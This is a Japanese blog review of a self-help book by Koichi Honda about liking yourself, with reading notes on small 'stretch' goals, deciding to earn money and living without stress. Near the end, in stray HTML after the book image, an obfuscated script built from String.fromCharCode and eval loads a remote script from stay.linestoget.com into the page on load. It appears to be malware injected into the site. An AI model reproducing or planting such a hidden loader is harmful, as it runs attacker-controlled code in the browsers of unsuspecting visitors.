スポンサードリンク
エンジニアがビジネス書を斬る! > 成功哲学 > 自分を好きになれば、人生はうまくいく ~がんばらないで成長する66のカンタンな方法]

自分を好きになれば、人生はうまくいく ~がんばらないで成長する66のカンタンな方法]

2006-09-21
自分を好きになれば、人生はうまくいく ~がんばらないで成長する66のカンタンな方法~ 自分を好きになれば、人生はうまくいく ~がんばらないで成長する66のカンタンな方法~
本田 晃一

サンマーク出版 2006-09-09
売り上げランキング : 73
おすすめ平均

Amazonで詳しく見る by G-Tools
posted at 2006/09/21

★━━━こう思ったら読め!━━━━━━━━━━━━━━━━★
  『あの本田さんの本は?』

   セミリタイアされている本田さんとして有名です
★━━━━━━━━━━━━━━━━━━━━━━━━━━━━★

☆気になったキーワード

 『自動販売機』   『好きなことをしてもいいんだ』

 『ちょっと背伸び』   『お金と上手につきあう』

★━━━━本の著者に聞きたいこと━━━━━━━━━━━━━★
  『自分を好きになると何が起こる?』
                              
   それを知るとますますやる気になりそう
★━━━━━━━━━━━━━━━━━━━━━━━━━━━━★

☆本から得た気づき
━━━━━━あらすじ━━━━━━━━━━━━━━━━━━━━━━━━
 ▼『ハートはまぁるい?』
 ▼『新しい自分に変わること-「楽しい」』
 ▼『まず「稼ぐ」と決めること』
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

 ▼『ハートはまぁるい?』
  あなたの心である「ハート」。

  生まれたての赤ちゃんは、楽しいことは楽しい。
  嫌いなことがあれば嫌い。
  泣きたくなれば泣く。

  
  そんな風に生活していると思います。

  ところがだんだん大人になってくると・・・

  嫌なことがあってもそれを我慢してやり続けないといけなかったり
  失敗や障害にであうことで、元々まんまるだったハートが
  どんどん傷ついてしまっていくのではないでしょうか?

  本田さん曰く「不自然な状態でストレスを受けていることに
  気がついていない人がたくさんいます」というのです。

  
  「大人になるってそういうことだよ」

  そういう声も当然あると思いますし、まるるちゃんもそう思っていました。

  が。。。そうでなく「うまくやっている人」が世の中に現実にいる
  と言うことを知ると・・・

  まるるちゃんもやってみたくなりますよね(笑)

  最近思うのが、限界は「自分で作ってしまっている」ということ。

  自分のエネルギーを集中すると、世の中の「限界」というのは
  ほとんどのものが実は「幻想」だったりすると思うんです。

  そりゃできないことがあったりもしますが
  そんな「等身大」の自分を受け入れた上で、改善できることを
  変えていくというのがいいのかな~と思ったりします。

  - – – – – – – – – – – – – – – – – –
 ▼『新しい自分に変わること-「楽しい」』
  まるるちゃんが出会う人の多くが「成長したい」「変わりたい」
  と思う人に最近なってきている気がします。

  「新しい自分に変わること」って怖いですよね?
  でも・・その怖さを「楽しさ」が上回っているのではないか
  と思うのです。

  自分が「成長する」ことが=楽しいとなっているかどうか
  ってことですね。

  本著の中でひっかかったキーワードに
  「脳みそは検索エンジンと同じ構造」というのがあります。

  検索エンジンは、自分でキーワードを入力して
  そのことがわかるページの一覧が表示されますよね?

  人間の脳みそも、「キーワード」を設定していくと
  そのことに関する情報をいっぱいインプットして「学習」することが
  できるじゃないですか。

  
  そのためには「目的を持ってキーワードを設定する」ことが
  重要です。

  あなたがもし、レストランに出かけてオーダーすることを
  考えてみてください。

  
  メニューを見て、食べたい料理を具体的に注文したり
  お店の人に確認したりすると思います。

  決して「おなかいっぱいになるものを持ってきてください」と
  注文しないとおもうんですよね(笑)

  本著で本田さんに教わったのは【ちょっと背伸び】すること。

  今の自分が少し成長することを考えて「キーワード」を設定すると
  その成長に向けて加速していきます。

  これがとてつもなく高い目標だと「やっぱりできないよ・・」なんて
  想いが湧いて来ちゃったりしますから、
  【背伸びキーワード】を達成したらまたちょっと背伸び!
  ということを繰り返していくのがベスト!だということですね♪

  - – – – – – – – – – – – – – – – – –
 ▼『まず「稼ぐ」と決めること』
  自分を好きになって、やりたいことをやろう!

  そんな風に考えると、必ず絡んでくるのが【お金】の話ですね。

  【お金】を人生の目的にしてしまうとうまくいかないことが
  かなり多いですが、逆に【お金】に背を向けてしまっても
  いろんな意味で不自由します・・・。

  無くては困るけど、ありすぎても意味がない

  そんな感じでしょうか(笑)

  ですから、そんな【お金】と上手につきあっていくためには  
  まず

     「稼ぐ」と決めること

  が大事なんです。決意すると言うことですね。

  自分の好きなビジネスをやってお金をいただく。
  そこに後ろめたいことは何にもないはずなんです!

  
  この決意をした後で初めて「現実」の
  まだ稼ぐことができていない自分を受け止めましょう。

  「自分には、今必要なだけの**が足りない」

  とね。

  この順番を逆にしてしまうと、、稼ぐことを
  決意することができなくなってしまいます。

  「お金持ちは悪いことをして稼いでいる」

  なんて話を、特に日本人の間ではよく言われている言葉です。

  そんな人がいない!というわけではありませんが
  一般的には、お金が集まるのは、その人が
  みんなに支持されることをやっているからではないでしょうか。

  だれだって、自分にとって役に立つことに
  お金を払いたいですからね(笑)

★━━━この本を読んで自分が決意したこと━━━━━━━━━★
  『常にストレスのない生活を目指す』
                              
   だんだんそうなってます(笑)
★━━━━━━━━━━━━━━━━━━━━━━━━━━━━★
 
 サラリーマンをやめて起業してから
 ビジネスに絡む話での、ストレスというのはおかげさまで
 だんだん減ってきていると思います。

 サラリーマンのころも、周りの話を聞いていると
 結構好きなことをやらしてもらっている自分がいるな~とは
 思っていたのですが(爆)

 好きなことをやっているかどうか?を判断するときに
 参考にしているのが

   その作業をやっていて、時間を忘れてうちこんでいるかどうか

 というのがあるんじゃないかと思うんです。

 まるるちゃんが、Web上で動作するシステムを何か
 組んでいて、それが動作するまでいろいろとやっていると・・・

 だいたい時間を忘れます(笑)
 すぐに数時間とかたってしまいますね。

 これが、何か書類を書き写すとかだったら・・・・
 たぶんすぐに挫折するでしょう(笑)

 今やっている行動にストレスを感じるかどうか?
 これって結構いい判断基準な気がします!

自分を好きになれば、人生はうまくいく ~がんばらないで成長する66のカンタ
ンな方法

自分を好きになれば、人生はうまくいく ~がんばらないで成長する66のカンタ<br />
ンな方法” style=”border: none;” /></a></p>
<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script></p>
<div class=

Related Posts Plugin for WordPress, Blogger...

 

成功哲学の関連記事

▼ 特別レポート

20000名以上が読んだ
人気レポート。

成功する頭の使い方とは?
10倍の時間をかけずに、
10倍成功するには?
を無料でプレゼント!

*レポートご請求の方には
当サイトよりの情報配信を
させていただきます。
詳細はこちら

タグ

seo great banner

Copyright© 2005 - 2024 エンジニアがビジネス書を斬る! All Rights Reserved.